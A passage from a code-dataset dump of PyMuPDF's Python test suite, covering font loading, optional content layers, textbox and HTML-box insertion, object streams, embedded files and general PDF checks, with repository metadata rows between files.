print(f'test_load_system_font():font_f(): Looking for font: {name=} {bold=} {italic=} {needs_exact_metrics=}.')
return None
def f_cjk(name, ordering, serif):
trace.append((name, ordering, serif))
print(f'test_load_system_font():f_cjk(): Looking for font: {name=} {ordering=} {serif=}.')
return None
def f_fallback(script, language, serif, bold, italic):
trace.append((script, language, serif, bold, italic))
print(f'test_load_system_font():f_fallback(): looking for font: {script=} {language=} {serif=} {bold=} {italic=}.')
return None
pymupdf.mupdf.fz_install_load_system_font_funcs(font_f, f_cjk, f_fallback)
f = pymupdf.mupdf.fz_load_system_font("some-font-name", 0, 0, 0)
assert trace == [
('some-font-name', 0, 0, 0),
], f'Incorrect {trace=}.'
print(f'test_load_system_font(): {f.m_internal=}')
def test_mupdf_subset_fonts2():
if not hasattr(pymupdf, 'mupdf'):
print('Not running on rebased.')
return
if pymupdf.mupdf_version_tuple < (1, 24):
print('Not running with mupdf < 1.24.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
with pymupdf.open(path) as doc:
n = len(doc)
pages = [i*2 for i in range(n//2)]
print(f'{pages=}.')
pymupdf.mupdf.pdf_subset_fonts2(pymupdf._as_pdf_document(doc), pages)
def test_3677():
pymupdf.TOOLS.set_subset_fontnames(True)
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3677.pdf')
font_names_expected = [
'BCDEEE+Aptos',
'BCDFEE+Aptos',
'BCDGEE+Calibri-Light',
'BCDHEE+Calibri-Light',
]
font_names = list()
with pymupdf.open(path) as document:
for page in document:
for block in page.get_text('dict')['blocks']:
if block['type'] == 0:
if 'lines' in block.keys():
for line in block['lines']:
for span in line['spans']:
font_name=span['font']
print(font_name)
font_names.append(font_name)
assert font_names == font_names_expected, f'{font_names=}'
def test_3933():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3933.pdf')
with pymupdf.open(path) as document:
page = document[0]
print(f'{len(page.get_fonts())=}')
expected = {
'BCDEEE+Calibri': 39,
'BCDFEE+SwissReSan-Regu': 53,
'BCDGEE+SwissReSan-Ital': 20,
'BCDHEE+SwissReSan-Bold': 20,
'BCDIEE+SwissReSan-Regu': 53,
'BCDJEE+Calibri': 39,
}
for xref, _, _, name, _, _ in page.get_fonts():
_, _, _, content = document.extract_font(xref)
if content:
font = pymupdf.Font(fontname=name, fontbuffer=content)
supported_symbols = font.valid_codepoints()
print(f'Font {name}: {len(supported_symbols)=}.', flush=1)
if pymupdf.mupdf_version_tuple < (1, 25):
assert len(supported_symbols) == 0
else:
assert len(supported_symbols) == expected.get(name)
| 7,255 | Python | .py | 168 | 33.52381 | 123 | 0.574166 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,340 | test_optional_content.py | pymupdf_PyMuPDF/tests/test_optional_content.py | """
Test of Optional Content code.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "joined.pdf")
def test_oc1():
"""Arbitrary calls to OC code to get coverage."""
doc = pymupdf.open()
ocg1 = doc.add_ocg("ocg1")
ocg2 = doc.add_ocg("ocg2")
ocg3 = doc.add_ocg("ocg3")
ocmd1 = doc.set_ocmd(xref=0, ocgs=(ocg1, ocg2))
doc.set_layer(-1)
doc.add_layer("layer1")
test = doc.get_layer()
test = doc.get_layers()
test = doc.get_ocgs()
test = doc.layer_ui_configs()
doc.switch_layer(0)
def test_oc2():
# source file with at least 4 pages
src = pymupdf.open(filename)
# new PDF with one page
doc = pymupdf.open()
page = doc.new_page()
# define the 4 rectangle quadrants to receive the source pages
r0 = page.rect / 2
r1 = r0 + (r0.width, 0, r0.width, 0)
r2 = r0 + (0, r0.height, 0, r0.height)
r3 = r2 + (r2.width, 0, r2.width, 0)
# make 4 OCGs - one for each source page image.
# only first is ON initially
ocg0 = doc.add_ocg("ocg0", on=True)
ocg1 = doc.add_ocg("ocg1", on=False)
ocg2 = doc.add_ocg("ocg2", on=False)
ocg3 = doc.add_ocg("ocg3", on=False)
ocmd0 = doc.set_ocmd(ve=["and", ocg0, ["not", ["or", ocg1, ocg2, ocg3]]])
ocmd1 = doc.set_ocmd(ve=["and", ocg1, ["not", ["or", ocg0, ocg2, ocg3]]])
ocmd2 = doc.set_ocmd(ve=["and", ocg2, ["not", ["or", ocg1, ocg0, ocg3]]])
ocmd3 = doc.set_ocmd(ve=["and", ocg3, ["not", ["or", ocg1, ocg2, ocg0]]])
ocmds = (ocmd0, ocmd1, ocmd2, ocmd3)
# insert the 4 source page images, each connected to one OCG
page.show_pdf_page(r0, src, 0, oc=ocmd0)
page.show_pdf_page(r1, src, 1, oc=ocmd1)
page.show_pdf_page(r2, src, 2, oc=ocmd2)
page.show_pdf_page(r3, src, 3, oc=ocmd3)
xobj_ocmds = [doc.get_oc(item[0]) for item in page.get_xobjects() if item[1] != 0]
assert set(ocmds) <= set(xobj_ocmds)
assert set((ocg0, ocg1, ocg2, ocg3)) == set(tuple(doc.get_ocgs().keys()))
doc.get_ocmd(ocmd0)
page.get_oc_items()
def test_3143():
"""Support for non-ascii layer names."""
doc = pymupdf.open(os.path.join(scriptdir, "resources", "test-3143.pdf"))
page = doc[0]
set0 = set([l["text"] for l in doc.layer_ui_configs()])
set1 = set([p["layer"] for p in page.get_drawings()])
set2 = set([b[2] for b in page.get_bboxlog(layers=True)])
assert set0 == set1 == set2
def test_3180():
doc = pymupdf.open()
page = doc.new_page()
# Define the items for the combo box
combo_items = ['first', 'second', 'third']
# Create a combo box field
combo_box = pymupdf.Widget() # create a new widget
combo_box.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
combo_box.field_name = "myComboBox"
combo_box.field_value = combo_items[0]
combo_box.choice_values = combo_items
combo_box.rect = pymupdf.Rect(50, 50, 200, 75) # position of the combo box
combo_box.script_change = """
var value = event.value;
app.alert('You selected: ' + value);
//var group_id = optional_content_group_ids[value];
"""
# Insert the combo box into the page
# https://pymupdf.readthedocs.io/en/latest/page.html#Page.add_widget
page.add_widget(combo_box)
# Create optional content groups
# https://github.com/pymupdf/PyMuPDF-Utilities/blob/master/jupyter-notebooks/optional-content.ipynb
# Load images and create OCGs for each
optional_content_group_ids = {}
for i, item in enumerate(combo_items):
optional_content_group_id = doc.add_ocg(item, on=False)
optional_content_group_ids[item] = optional_content_group_id
rect = pymupdf.Rect(50, 100, 250, 300)
image_file_name = f'{item}.png'
# xref = page.insert_image(
# rect,
# filename=image_file_name,
# oc=optional_content_group_id,
# )
first_id = optional_content_group_ids['first']
second_id = optional_content_group_ids['second']
third_id = optional_content_group_ids['third']
# https://pymupdf.readthedocs.io/en/latest/document.html#Document.set_layer
doc.set_layer(-1, basestate="OFF")
layers = doc.get_layer()
doc.set_layer(config=-1, on=[first_id])
# https://pymupdf.readthedocs.io/en/latest/document.html#Document.set_layer_ui_config
# configs = doc.layer_ui_configs()
# doc.set_layer_ui_config(0, pymupdf.PDF_OC_ON)
# doc.set_layer_ui_config('third', action=2)
# Save the PDF
doc.save(os.path.abspath(f'{__file__}/../../tests/test_3180.pdf'))
doc.close()
| 4,629 | Python | .py | 109 | 37.266055 | 103 | 0.641203 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,341 | test_textbox.py | pymupdf_PyMuPDF/tests/test_textbox.py | """
Fill a given text in a rectangle on some PDF page using
1. TextWriter object
2. Basic text output
Check text is indeed contained in given rectangle.
"""
import pymupdf
text = """Der Kleine Schwertwal (Pseudorca crassidens), auch bekannt als Unechter oder Schwarzer Schwertwal, ist eine Art der Delfine (Delphinidae) und der einzige rezente Vertreter der Gattung Pseudorca.
Er ähnelt dem Orca in Form und Proportionen, ist aber einfarbig schwarz und mit einer Maximallänge von etwa sechs Metern deutlich kleiner.
Kleine Schwertwale bilden Schulen von durchschnittlich zehn bis fünfzig Tieren, wobei sie sich auch mit anderen Delfinen vergesellschaften und sich meistens abseits der Küsten aufhalten.
Sie sind in allen Ozeanen gemäßigter, subtropischer und tropischer Breiten beheimatet, sind jedoch vor allem in wärmeren Jahreszeiten auch bis in die gemäßigte bis subpolare Zone südlich der Südspitze Südamerikas, vor Nordeuropa und bis vor Kanada anzutreffen."""
def test_textbox1():
"""Use TextWriter for text insertion."""
doc = pymupdf.open()
page = doc.new_page()
rect = pymupdf.Rect(50, 50, 400, 400)
blue = (0, 0, 1)
tw = pymupdf.TextWriter(page.rect, color=blue)
tw.fill_textbox(
rect,
text,
align=pymupdf.TEXT_ALIGN_LEFT,
fontsize=12,
)
tw.write_text(page, morph=(rect.tl, pymupdf.Matrix(1, 1)))
# check text containment
assert page.get_text() == page.get_text(clip=rect)
page.write_text(writers=tw)
def test_textbox2():
"""Use basic text insertion."""
doc = pymupdf.open()
ocg = doc.add_ocg("ocg1")
page = doc.new_page()
rect = pymupdf.Rect(50, 50, 400, 400)
blue = pymupdf.utils.getColor("lightblue")
red = pymupdf.utils.getColorHSV("red")
page.insert_textbox(
rect,
text,
align=pymupdf.TEXT_ALIGN_LEFT,
fontsize=12,
color=blue,
oc=ocg,
)
# check text containment
assert page.get_text() == page.get_text(clip=rect)
def test_textbox3():
"""Use TextWriter for text insertion."""
doc = pymupdf.open()
page = doc.new_page()
font = pymupdf.Font("cjk")
rect = pymupdf.Rect(50, 50, 400, 400)
blue = (0, 0, 1)
tw = pymupdf.TextWriter(page.rect, color=blue)
tw.fill_textbox(
rect,
text,
align=pymupdf.TEXT_ALIGN_LEFT,
font=font,
fontsize=12,
right_to_left=True,
)
tw.write_text(page, morph=(rect.tl, pymupdf.Matrix(1, 1)))
# check text containment
assert page.get_text() == page.get_text(clip=rect)
doc.scrub()
doc.subset_fonts()
def test_textbox4():
"""Use TextWriter for text insertion."""
doc = pymupdf.open()
ocg = doc.add_ocg("ocg1")
page = doc.new_page()
rect = pymupdf.Rect(50, 50, 400, 600)
blue = (0, 0, 1)
tw = pymupdf.TextWriter(page.rect, color=blue)
tw.fill_textbox(
rect,
text,
align=pymupdf.TEXT_ALIGN_LEFT,
fontsize=12,
font=pymupdf.Font("cour"),
right_to_left=True,
)
tw.write_text(page, oc=ocg, morph=(rect.tl, pymupdf.Matrix(1, 1)))
# check text containment
assert page.get_text() == page.get_text(clip=rect)
def test_textbox5():
"""Using basic text insertion."""
small_glyph_heights0 = pymupdf.TOOLS.set_small_glyph_heights()
pymupdf.TOOLS.set_small_glyph_heights(True)
try:
doc = pymupdf.open()
page = doc.new_page()
r = pymupdf.Rect(100, 100, 150, 150)
text = "words and words and words and more words..."
rc = -1
fontsize = 12
page.draw_rect(r)
while rc < 0:
rc = page.insert_textbox(
r,
text,
fontsize=fontsize,
align=pymupdf.TEXT_ALIGN_JUSTIFY,
)
fontsize -= 0.5
blocks = page.get_text("blocks")
bbox = pymupdf.Rect(blocks[0][:4])
assert bbox in r
finally:
# Must restore small_glyph_heights, otherwise other tests can fail.
pymupdf.TOOLS.set_small_glyph_heights(small_glyph_heights0)
def test_2637():
"""Ensure correct calculation of fitting text."""
doc = pymupdf.open()
page = doc.new_page()
text = (
"The morning sun painted the sky with hues of orange and pink. "
"Birds chirped harmoniously, greeting the new day. "
"Nature awakened, filling the air with life and promise."
)
rect = pymupdf.Rect(50, 50, 500, 280)
fontsize = 50
rc = -1
while rc < 0: # look for largest font size that makes the text fit
rc = page.insert_textbox(rect, text, fontname="hebo", fontsize=fontsize)
fontsize -= 1
# confirm text won't lap outside rect
blocks = page.get_text("blocks")
bbox = pymupdf.Rect(blocks[0][:4])
assert bbox in rect
def test_htmlbox1():
"""Write HTML-styled text into a rect with different rotations.
The text is styled and contains a link.
Then extract the text again, and
- assert that text was written in the 4 different angles,
- assert that text properties are correct (bold, italic, color),
- assert that the link has been correctly inserted.
We try to insert into a rectangle that is too small, setting
scale=False and confirming we have a negative return code.
"""
if not hasattr(pymupdf, "mupdf"):
print("'test_htmlbox1' not executed in classic.")
return
rect = pymupdf.Rect(100, 100, 200, 200) # this only works with scale=True
base_text = """Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum."""
text = """Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation <b>ullamco</b> <i>laboris</i> nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in <span style="color: #0f0;font-weight:bold;">voluptate</span> velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui <a href="https://www.artifex.com">officia</a> deserunt mollit anim id est laborum."""
doc = pymupdf.Document()
for rot in (0, 90, 180, 270):
wdirs = ((1, 0), (0, -1), (-1, 0), (0, 1)) # all writing directions
page = doc.new_page()
spare_height, scale = page.insert_htmlbox(rect, text, rotate=rot, scale_low=1)
assert spare_height < 0
assert scale == 1
spare_height, scale = page.insert_htmlbox(rect, text, rotate=rot, scale_low=0)
assert spare_height == 0
assert 0 < scale < 1
page = doc.reload_page(page)
link = page.get_links()[0] # extracts the links on the page
assert link["uri"] == "https://www.artifex.com"
# Assert plain text is complete.
# We must remove line breaks and any ligatures for this.
assert base_text == page.get_text(flags=0)[:-1].replace("\n", " ")
encounters = 0 # counts the words with selected properties
for b in page.get_text("dict")["blocks"]:
for l in b["lines"]:
wdir = l["dir"] # writing direction
assert wdir == wdirs[page.number]
for s in l["spans"]:
stext = s["text"]
color = pymupdf.sRGB_to_pdf(s["color"])
bold = bool(s["flags"] & 16)
italic = bool(s["flags"] & 2)
if stext in ("ullamco", "laboris", "voluptate"):
encounters += 1
if stext == "ullamco":
assert bold is True
assert italic is False
assert color == pymupdf.pdfcolor["black"]
elif stext == "laboris":
assert bold is False
assert italic is True
assert color == pymupdf.pdfcolor["black"]
elif stext == "voluptate":
assert bold is True
assert italic is False
assert color == pymupdf.pdfcolor["green"]
else:
assert bold is False
assert italic is False
# all 3 special special words were encountered
assert encounters == 3
def test_htmlbox2():
"""Test insertion without scaling"""
if not hasattr(pymupdf, "mupdf"):
print("'test_htmlbox2' not executed in classic.")
return
doc = pymupdf.open()
rect = pymupdf.Rect(100, 100, 200, 200) # large enough to hold text
page = doc.new_page()
bottoms = set()
for rot in (0, 90, 180, 270):
spare_height, scale = page.insert_htmlbox(
rect, "Hello, World!", scale_low=1, rotate=rot
)
assert scale == 1
assert 0 < spare_height < rect.height
bottoms.add(spare_height)
assert len(bottoms) == 1 # same result for all rotations
def test_htmlbox3():
"""Test insertion with opacity"""
if not hasattr(pymupdf, "mupdf"):
print("'test_htmlbox3' not executed in classic.")
return
rect = pymupdf.Rect(100, 250, 300, 350)
text = """<span style="color:red;font-size:20px;">Just some text.</span>"""
doc = pymupdf.open()
page = doc.new_page()
# insert some text with opacity
page.insert_htmlbox(rect, text, opacity=0.5)
# lowlevel-extract inserted text to access opacity
span = page.get_texttrace()[0]
assert span["opacity"] == 0.5
def test_3559():
if pymupdf.mupdf_version_tuple < (1, 24, 4):
print(f'test_3559(): Not running because mupdf known to SEGV.')
return
doc = pymupdf.Document()
page = doc.new_page()
text_insert="""<body><h3></h3></body>"""
rect = pymupdf.Rect(100, 100, 200, 200)
page.insert_htmlbox(rect, text_insert)
def test_3916():
doc = pymupdf.open()
rect = pymupdf.Rect(100, 100, 101, 101) # Too small for the text.
page = doc.new_page()
spare_height, scale = page.insert_htmlbox(rect, "Hello, World!", scale_low=0.5)
assert spare_height == -1
| 10,628 | Python | .py | 238 | 36.264706 | 549 | 0.627479 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,342 | test_docs_samples.py | pymupdf_PyMuPDF/tests/test_docs_samples.py | '''
Test sample scripts in docs/samples/.
'''
import glob
import os
import pytest
import runpy
# We only look at sample scripts that can run standalone (i.e. don't require
# sys.argv).
#
root = os.path.abspath(f'{__file__}/../..')
samples = []
for p in glob.glob(f'{root}/docs/samples/*.py'):
if os.path.basename(p) in (
'make-bold.py', # Needs sys.argv[1].
'multiprocess-gui.py', # GUI.
'multiprocess-render.py', # Needs sys.argv[1].
'text-lister.py', # Needs sys.argv[1].
):
print(f'Not testing: {p}')
else:
p = os.path.relpath(p, root)
samples.append(p)
def _test_all():
# Allow runnings tests directly without pytest.
import subprocess
import sys
e = 0
for sample in samples:
print( f'Running: {sample}', flush=1)
try:
if 0:
# Curiously this fails in an odd way when testing compound
# package with $PYTHONPATH set.
print( f'os.environ is:')
for n, v in os.environ.items():
print( f' {n}: {v!r}')
command = f'{sys.executable} {sample}'
print( f'command is: {command!r}')
sys.stdout.flush()
subprocess.check_call( command, shell=1, text=1)
else:
runpy.run_path(sample)
except Exception:
print( f'Failed: {sample}')
e += 1
if e:
raise Exception( f'Errors: {e}')
# We use pytest.mark.parametrize() to run sample scripts via a fn, which
# ensures that pytest treats each script as a test.
#
@pytest.mark.parametrize('sample', samples)
def test_docs_samples(sample):
sample = f'{root}/{sample}'
runpy.run_path(sample)
| 1,801 | Python | .py | 55 | 24.909091 | 76 | 0.565442 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,343 | test_objectstreams.py | pymupdf_PyMuPDF/tests/test_objectstreams.py | import pymupdf
def test_objectstream1():
"""Test save option "use_objstms".
This option compresses PDF object definitions into a special object type
"ObjStm". We test its presence by searching for that /Type.
"""
if not hasattr(pymupdf, "mupdf"):
# only implemented for rebased
return
# make some arbitrary page with content
text = "Hello, World! Hallo, Welt!"
doc = pymupdf.open()
page = doc.new_page()
rect = (50, 50, 200, 500)
page.insert_htmlbox(rect, text) # place into the rectangle
_ = doc.write(use_objstms=True)
found = False
for xref in range(1, doc.xref_length()):
objstring = doc.xref_object(xref, compressed=True)
if "/Type/ObjStm" in objstring:
found = True
break
assert found, "No object stream found"
def test_objectstream2():
"""Test save option "use_objstms".
This option compresses PDF object definitions into a special object type
"ObjStm". We test its presence by searching for that /Type.
"""
if not hasattr(pymupdf, "mupdf"):
# only implemented for rebased
return
# make some arbitrary page with content
text = "Hello, World! Hallo, Welt!"
doc = pymupdf.open()
page = doc.new_page()
rect = (50, 50, 200, 500)
page.insert_htmlbox(rect, text) # place into the rectangle
_ = doc.write(use_objstms=False)
found = False
for xref in range(1, doc.xref_length()):
objstring = doc.xref_object(xref, compressed=True)
if "/Type/ObjStm" in objstring:
found = True
break
assert not found, "Unexpected: Object stream found!"
def test_objectstream3():
"""Test ez_save().
Should automatically use object streams
"""
if not hasattr(pymupdf, "mupdf"):
# only implemented for rebased
return
import io
fp = io.BytesIO()
# make some arbitrary page with content
text = "Hello, World! Hallo, Welt!"
doc = pymupdf.open()
page = doc.new_page()
rect = (50, 50, 200, 500)
page.insert_htmlbox(rect, text) # place into the rectangle
doc.ez_save(fp) # save PDF to memory
found = False
for xref in range(1, doc.xref_length()):
objstring = doc.xref_object(xref, compressed=True)
if "/Type/ObjStm" in objstring:
found = True
break
assert found, "No object stream found!"
| 2,432 | Python | .py | 68 | 29.367647 | 76 | 0.642827 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,344 | test_embeddedfiles.py | pymupdf_PyMuPDF/tests/test_embeddedfiles.py | """
Tests for PDF EmbeddedFiles functions.
"""
import pymupdf
def test_embedded1():
doc = pymupdf.open()
buffer = b"123456678790qwexcvnmhofbnmfsdg4589754uiofjkb-"
doc.embfile_add(
"file1",
buffer,
filename="testfile.txt",
ufilename="testfile-u.txt",
desc="Description of some sort",
)
assert doc.embfile_count() == 1
assert doc.embfile_names() == ["file1"]
assert doc.embfile_info(0)["name"] == "file1"
doc.embfile_upd(0, filename="new-filename.txt")
assert doc.embfile_info(0)["filename"] == "new-filename.txt"
assert doc.embfile_get(0) == buffer
doc.embfile_del(0)
assert doc.embfile_count() == 0 | 688 | Python | .py | 22 | 26.227273 | 64 | 0.654135 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,345 | test_general.py | pymupdf_PyMuPDF/tests/test_general.py | # encoding utf-8
"""
* Confirm sample doc has no links and no annots.
* Confirm proper release of file handles via Document.close()
* Confirm properly raising exceptions in document creation
"""
import io
import os
import pymupdf
import pathlib
import pickle
import platform
import re
import subprocess
import sys
import textwrap
import time
import gentle_compare
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
def test_haslinks():
doc = pymupdf.open(filename)
assert doc.has_links() == False
def test_hasannots():
doc = pymupdf.open(filename)
assert doc.has_annots() == False
def test_haswidgets():
doc = pymupdf.open(filename)
assert doc.is_form_pdf == False
def test_isrepaired():
doc = pymupdf.open(filename)
assert doc.is_repaired == False
pymupdf.TOOLS.mupdf_warnings()
def test_isdirty():
doc = pymupdf.open(filename)
assert doc.is_dirty == False
def test_cansaveincrementally():
doc = pymupdf.open(filename)
assert doc.can_save_incrementally() == True
def test_iswrapped():
doc = pymupdf.open(filename)
page = doc[0]
assert page.is_wrapped
def test_wrapcontents():
doc = pymupdf.open(filename)
page = doc[0]
page.wrap_contents()
xref = page.get_contents()[0]
cont = page.read_contents()
doc.update_stream(xref, cont)
page.set_contents(xref)
assert len(page.get_contents()) == 1
page.clean_contents()
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'PDF stream Length incorrect'
def test_page_clean_contents():
"""Assert that page contents cleaning actually is invoked."""
doc = pymupdf.open()
page = doc.new_page()
# draw two rectangles - will lead to two /Contents objects
page.draw_rect((10, 10, 20, 20))
page.draw_rect((20, 20, 30, 30))
assert len(page.get_contents()) == 2
assert page.read_contents().startswith(b"q") == False
# clean / consolidate into one /Contents object
page.clean_contents()
assert len(page.get_contents()) == 1
assert page.read_contents().startswith(b"q") == True
def test_annot_clean_contents():
"""Assert that annot contents cleaning actually is invoked."""
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_highlight_annot((10, 10, 20, 20))
# the annotation appearance will not start with command b"q"
# invoke appearance stream cleaning and reformatting
annot.clean_contents()
# appearance stream should now indeed start with command b"q"
assert annot._getAP().startswith(b"q") == True
def test_config():
assert pymupdf.TOOLS.fitz_config["py-memory"] in (True, False)
def test_glyphnames():
name = "infinity"
infinity = pymupdf.glyph_name_to_unicode(name)
assert pymupdf.unicode_to_glyph_name(infinity) == name
def test_rgbcodes():
sRGB = 0xFFFFFF
assert pymupdf.sRGB_to_pdf(sRGB) == (1, 1, 1)
assert pymupdf.sRGB_to_rgb(sRGB) == (255, 255, 255)
def test_pdfstring():
pymupdf.get_pdf_now()
pymupdf.get_pdf_str("Beijing, chinesisch 北京")
pymupdf.get_text_length("Beijing, chinesisch 北京", fontname="china-s")
pymupdf.get_pdf_str("Latin characters êßöäü")
def test_open_exceptions():
try:
doc = pymupdf.open(filename, filetype="xps")
except RuntimeError as e:
assert repr(e).startswith("FileDataError")
try:
doc = pymupdf.open(filename, filetype="xxx")
except Exception as e:
assert repr(e).startswith("ValueError")
try:
doc = pymupdf.open("x.y")
except Exception as e:
assert repr(e).startswith("FileNotFoundError")
try:
doc = pymupdf.open("pdf", b"")
except RuntimeError as e:
assert repr(e).startswith("EmptyFileError")
def test_bug1945():
pdf = pymupdf.open(f'{scriptdir}/resources/bug1945.pdf')
buffer_ = io.BytesIO()
pdf.save(buffer_, clean=True)
def test_bug1971():
for _ in range(2):
doc = pymupdf.Document(f'{scriptdir}/resources/bug1971.pdf')
page = next(doc.pages())
page.get_drawings()
doc.close()
assert doc.is_closed
def test_default_font():
f = pymupdf.Font()
assert str(f) == "Font('Noto Serif Regular')"
assert repr(f) == "Font('Noto Serif Regular')"
def test_add_ink_annot():
import math
document = pymupdf.Document()
page = document.new_page()
line1 = []
line2 = []
for a in range( 0, 360*2, 15):
x = a
c = 300 + 200 * math.cos( a * math.pi/180)
s = 300 + 100 * math.sin( a * math.pi/180)
line1.append( (x, c))
line2.append( (x, s))
page.add_ink_annot( [line1, line2])
page.insert_text((100, 72), 'Hello world')
page.add_text_annot((200,200), "Some Text")
page.get_bboxlog()
path = f'{scriptdir}/resources/test_add_ink_annot.pdf'
document.save( path)
print( f'Have saved to: path={path!r}')
def test_techwriter_append():
print(pymupdf.__doc__)
doc = pymupdf.open()
page = doc.new_page()
tw = pymupdf.TextWriter(page.rect)
text = "Red rectangle = TextWriter.text_rect, blue circle = .last_point"
r = tw.append((100, 100), text)
print(f'r={r!r}')
tw.write_text(page)
page.draw_rect(tw.text_rect, color=pymupdf.pdfcolor["red"])
page.draw_circle(tw.last_point, 2, color=pymupdf.pdfcolor["blue"])
path = f"{scriptdir}/resources/test_techwriter_append.pdf"
doc.ez_save(path)
print( f'Have saved to: {path}')
def test_opacity():
doc = pymupdf.open()
page = doc.new_page()
annot1 = page.add_circle_annot((50, 50, 100, 100))
annot1.set_colors(fill=(1, 0, 0), stroke=(1, 0, 0))
annot1.set_opacity(2 / 3)
annot1.update(blend_mode="Multiply")
annot2 = page.add_circle_annot((75, 75, 125, 125))
annot2.set_colors(fill=(0, 0, 1), stroke=(0, 0, 1))
annot2.set_opacity(1 / 3)
annot2.update(blend_mode="Multiply")
outfile = f'{scriptdir}/resources/opacity.pdf'
doc.save(outfile, expand=True, pretty=True)
print("saved", outfile)
def test_get_text_dict():
import json
doc=pymupdf.open(f'{scriptdir}/resources/v110-changes.pdf')
page=doc[0]
blocks=page.get_text("dict")["blocks"]
# Check no opaque types in `blocks`.
json.dumps( blocks, indent=4)
def test_font():
font = pymupdf.Font()
print(repr(font))
bbox = font.glyph_bbox( 65)
print( f'bbox={bbox!r}')
def test_insert_font():
doc=pymupdf.open(f'{scriptdir}/resources/v110-changes.pdf')
page = doc[0]
i = page.insert_font()
print( f'page.insert_font() => {i}')
def test_2173():
from pymupdf import IRect, Pixmap, CS_RGB, Colorspace
for i in range( 100):
#print( f'i={i!r}')
image = Pixmap(Colorspace(CS_RGB), IRect(0, 0, 13, 37))
print( 'test_2173() finished')
def test_texttrace():
import time
document = pymupdf.Document( f'{scriptdir}/resources/joined.pdf')
t = time.time()
for page in document:
tt = page.get_texttrace()
t = time.time() - t
print( f'test_texttrace(): t={t!r}')
# Repeat, this time writing data to file.
import json
path = f'{scriptdir}/resources/test_texttrace.txt'
print( f'test_texttrace(): Writing to: {path}')
with open( path, 'w') as f:
for i, page in enumerate(document):
tt = page.get_texttrace()
print( f'page {i} json:\n{json.dumps(tt, indent=" ")}', file=f)
def test_2533():
"""Assert correct char bbox in page.get_texttrace().
Search for a unique char on page and confirm that page.get_texttrace()
returns the same bbox as the search method.
"""
if hasattr(pymupdf, 'mupdf') and not pymupdf.g_use_extra:
print('Not running test_2533() because rebased with use_extra=0 known to fail')
return
pymupdf.TOOLS.set_small_glyph_heights(True)
try:
doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2533.pdf"))
page = doc[0]
NEEDLE = "民"
ord_NEEDLE = ord(NEEDLE)
for span in page.get_texttrace():
for char in span["chars"]:
if char[0] == ord_NEEDLE:
bbox = pymupdf.Rect(char[3])
break
bbox2 = page.search_for(NEEDLE)[0]
assert bbox2 == bbox, f'{bbox=} {bbox2=} {bbox2-bbox=}.'
finally:
pymupdf.TOOLS.set_small_glyph_heights(False)
def test_2645():
"""Assert same font size calculation in corner cases.
"""
folder = os.path.join(scriptdir, "resources")
files = ("test_2645_1.pdf", "test_2645_2.pdf", "test_2645_3.pdf")
for f in files:
doc = pymupdf.open(os.path.join(folder, f))
page = doc[0]
fontsize0 = page.get_texttrace()[0]["size"]
fontsize1 = page.get_text("dict", flags=pymupdf.TEXTFLAGS_TEXT)["blocks"][0]["lines"][
0
]["spans"][0]["size"]
assert abs(fontsize0 - fontsize1) < 1e-5
def test_2506():
"""Ensure expected font size across text writing angles."""
doc = pymupdf.open()
page = doc.new_page()
point = pymupdf.Point(100, 300) # insertion point
fontsize = 11 # fontsize
text = "Hello" # text
angles = (0, 30, 60, 90, 120) # some angles
# write text with different angles
for angle in angles:
page.insert_text(
point, text, fontsize=fontsize, morph=(point, pymupdf.Matrix(angle))
)
# ensure correct fontsize for get_texttrace() - forgiving rounding problems
for span in page.get_texttrace():
print(span["dir"])
assert round(span["size"]) == fontsize
# ensure correct fontsize for get_text() - forgiving rounding problems
for block in page.get_text("dict")["blocks"]:
for line in block["lines"]:
print(line["dir"])
for span in line["spans"]:
print(span["size"])
assert round(span["size"]) == fontsize
def test_2108():
doc = pymupdf.open(f'{scriptdir}/resources/test_2108.pdf')
page = doc[0]
areas = page.search_for("{sig}")
rect = areas[0]
page.add_redact_annot(rect)
page.apply_redactions()
text = page.get_text()
text_expected = b'Frau\nClaire Dunphy\nTeststra\xc3\x9fe 5\n12345 Stadt\nVertragsnummer: 12345\nSehr geehrte Frau Dunphy,\nText\nMit freundlichen Gr\xc3\xbc\xc3\x9fen\nTestfirma\nVertrag:\n 12345\nAnsprechpartner:\nJay Pritchet\nTelefon:\n123456\nE-Mail:\ntest@test.de\nDatum:\n07.12.2022\n'.decode('utf8')
if 1:
# Verbose info.
print(f'test_2108(): text is:\n{text}')
print(f'')
print(f'test_2108(): repr(text) is:\n{text!r}')
print(f'')
